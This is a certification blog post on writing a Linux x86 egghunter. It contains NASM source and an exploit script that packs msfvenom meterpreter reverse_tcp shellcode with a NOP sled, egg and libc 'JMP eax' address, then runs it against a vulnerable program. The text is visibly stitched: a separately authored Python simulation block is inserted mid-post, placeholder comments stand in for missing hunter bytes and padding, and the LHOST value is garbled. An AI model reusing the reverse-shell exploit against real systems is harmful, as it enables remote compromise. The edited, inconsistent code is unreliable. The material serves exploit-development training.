SLAE: 0x3 Egghunters

Sun 02 April 2017

0x1 Requirements

Write a custom egghunter that works with custom shellcode

The egghunter uses the address held in esp as its starting point and walks memory upwards or downwards, depending on whether the first instruction of the search loop increments or decrements the address by 1.

While looking through examples on shellstorm I saw the idea of subtracting 1 byte from the egg itself in order to avoid a duplicate egg in the completed shellcode, which I found nice, so I've implemented this in my egghunter.

0x2 Demo: putting it all together

0x3 Code walkthrough

; Filename: small_egghunter.nasm
; Author:  Plaix
; Website:
; Purpose:
; Searches up or down for our egg, which is only 4 bytes

; Compile:
; --------
; nasm -f elf32 -o small_egghunter.o small_egghunter.nasm
; ld -o small_egghunter small_egghunter.o

global _start

section .text

_start:
    mov eax,esp ; get an address on the stack that's valid
    ; we will mov 0xdeadbeee into ebx instead of our egg
    ; and inc it by 1 to avoid our egghunter finding the 0xdeadbeef value in ebx
    ; instead of at the right spot
    mov ebx,0xdeadbeee
    inc ebx

hunt:           ; label renamed from "loop", which NASM treats as the x86 loop mnemonic
    inc eax     ; search upwards one byte at a time (dec eax here would search downwards)
    cmp dword [eax],ebx
    jnz hunt
    ; if the egg is found
    ; play nice with the python script
    add eax,0x4 ; skip the 4-byte egg so eax points at the first byte of the shellcode
    push eax
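The two ideas in the requirements and in the walkthrough above (a byte-by-byte search that starts from a stack address and steps up or down, and storing the egg as egg-1 plus an inc so the hunter never matches its own immediate) can be modelled outside the debugger. The following is an added Python 3 example, not code from the post: it simulates the search over a constructed byte string, shows that a hunter holding the literal egg matches its own mov-immediate before reaching the real egg, and then runs a defender-side signature check for both the literal egg and the "mov ebx, egg-1 ; inc ebx" idiom. Only the encodings of mov ebx,imm32 (0xBB imm32) and inc ebx (0x43) are real x86; the NOP filler, the "A" padding and the 0xCC stand-in payload are constructed sample data, and starting the search just before the hunter's own bytes is an assumption made so the self-match problem is visible.

```python
import struct

EGG = 0xDEADBEEF  # the 4-byte egg used on the page


def egg_bytes(value):
    """Little-endian encoding of a 32-bit egg, which is how cmp dword [eax],ebx sees it in memory."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def hunter_prefix(egg, obfuscated):
    """Constructed first instructions of a hunter: mov ebx,imm32 (BB imm32), plus inc ebx (43) when
    the egg-1 trick from the page is used.  The rest of the hunter is not modelled."""
    if obfuscated:
        return b"\xbb" + egg_bytes(egg - 1) + b"\x43"
    return b"\xbb" + egg_bytes(egg)


def hunt(memory, start, egg, step=1):
    """Simulate the page's loop: inc (or dec) the address, compare the dword there with the egg,
    repeat until it matches.  Returns the address 4 bytes past the egg (where the hunter leaves eax),
    or None when the egg is not present in the modelled memory."""
    tag = egg_bytes(egg)
    addr = start
    while True:
        addr += step
        if addr < 0 or addr + 4 > len(memory):
            return None
        if memory[addr:addr + 4] == tag:
            return addr + 4


def build_memory(obfuscated):
    """Constructed memory image: hunter, padding, then egg followed by a stand-in payload.
    Returns the image and the offset of the real egg."""
    hunter = hunter_prefix(EGG, obfuscated) + b"\x90" * 8   # NOP filler stands in for the rest of the hunter
    filler = b"A" * 32
    payload = b"\xcc" * 16                                   # constructed stand-in for the shellcode
    memory = hunter + filler + egg_bytes(EGG) + payload
    return memory, len(hunter) + len(filler)


def where_hunter_lands(obfuscated):
    """Compare where the search stops with where it should stop (just past the real egg)."""
    memory, real_egg = build_memory(obfuscated)
    landed = hunt(memory, start=0, egg=EGG)
    return landed, real_egg + 4


def find_egghunter_signatures(blob, egg=EGG):
    """Defender-side check over a byte blob: report offsets of 'mov ebx, egg' and of the
    'mov ebx, egg-1 ; inc ebx' idiom.  A scan for the literal egg alone misses the second form."""
    literal = b"\xbb" + egg_bytes(egg)
    idiom = b"\xbb" + egg_bytes(egg - 1) + b"\x43"
    hits = []
    for off in range(len(blob)):
        if blob.startswith(literal, off):
            hits.append((off, "mov ebx, egg"))
        elif blob.startswith(idiom, off):
            hits.append((off, "mov ebx, egg-1 ; inc ebx"))
    return hits


if __name__ == "__main__":
    for obf in (False, True):
        landed, wanted = where_hunter_lands(obf)
        print("egg-1 trick: %-5s hunter stops at %s, real shellcode at %d" % (obf, landed, wanted))
        print("  signatures:", find_egghunter_signatures(build_memory(obf)[0]))
```

With the literal egg the simulated search stops at offset 5, inside the hunter's own mov instruction, instead of at offset 49 where the payload begins; with the egg-1 form both values agree. The signature scan is the piece a detection engineer would keep: the literal form is found by searching for the egg, the obfuscated form needs the idiom pattern.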

0x4 Example

I've included a vuln.c program and this Python script, which uses the egghunter and a generated Linux meterpreter reverse_tcp shell to exploit the program.


import os
import subprocess

# egghunter 60 bytes
# shellcode 500 bytes

# msfvenom output header, kept from the page:
#  linux/x86/meterpreter/reverse_tcp LHOST=192.168/56.10 LPORT=4444
#  msfvenom -p linux/x86/meterpreter/reverse_tcp lhost= -f py  -b "\x00\x0a\xff\x60\x22\x27\x28\x29"
#  482 bytes

buf =  ""
buf += "\xd9\xe8\xbf\xf6\xd0\x96\x16\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x12\x31\x7d\x1a\x03\x7d\x1a\x83\xc5\x04\xe2"
buf += "\x03\xe1\x4d\xe1\x08\x51\x31\x5d\xa4\x54\x05\x07\xb1"
buf += "\xb8\xa8\x48\x56\x61\x5b\x89\xf0\xae\x91\x61\x02\xcf"
buf += "\xb4\x2d\x8b\x2e\xdc\xab\xd3\xe0\x70\x63\x6a\xe1\x30"
buf += "\x46\xec\x50\xb1\xe1\xec\x84\xbe\x11\x65\x47\x7f\xfa"
buf += "\x79\x49\x63\xf1\x31\x34\xa9\x8a\x6a\x4e\xd0\x12\x3a"
buf += "\x5c\xa3\x26\x8f\xdd\x3c\xc9"

# PLACEHOLDER: the assembled bytes of small_egghunter.nasm are not reproduced on the page
egghunter = ""

# 0xdeadbeef as it sits in memory (little-endian); the hunter leaves eax 4 bytes past it
egg = "\xef\xbe\xad\xde"

print "Prepending shellcode with %i nops..." % (500-(len(buf)+4))

# 500-byte buffer: nop sled, 4-byte egg, shellcode
shBuf = "\x90" * (500-(len(buf)+4)) + egg + buf
shellcode = shBuf

#for x in range(len(shellcode)):
#    print "%i\t%s\t\\x%02x" % (x,shellcode[x],ord(shellcode[x]))

EIP="\xf2\x1c\xe4\xb7" # libc JMP eax

# PLACEHOLDER layout: the padding between the egghunter and EIP depends on vuln.c, which is not on the page
eggBuf = egghunter + EIP

# run the exploit
#os.system("gdb -q --args ./vuln "+shBuf+" "+eggBuf)
#os.system("./vuln "+shBuf+" "+ eggBuf)
#subprocess.call('gdb -q --args ./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)
subprocess.call('./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)

0x0 Resources used:


Linux man pages:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE - 827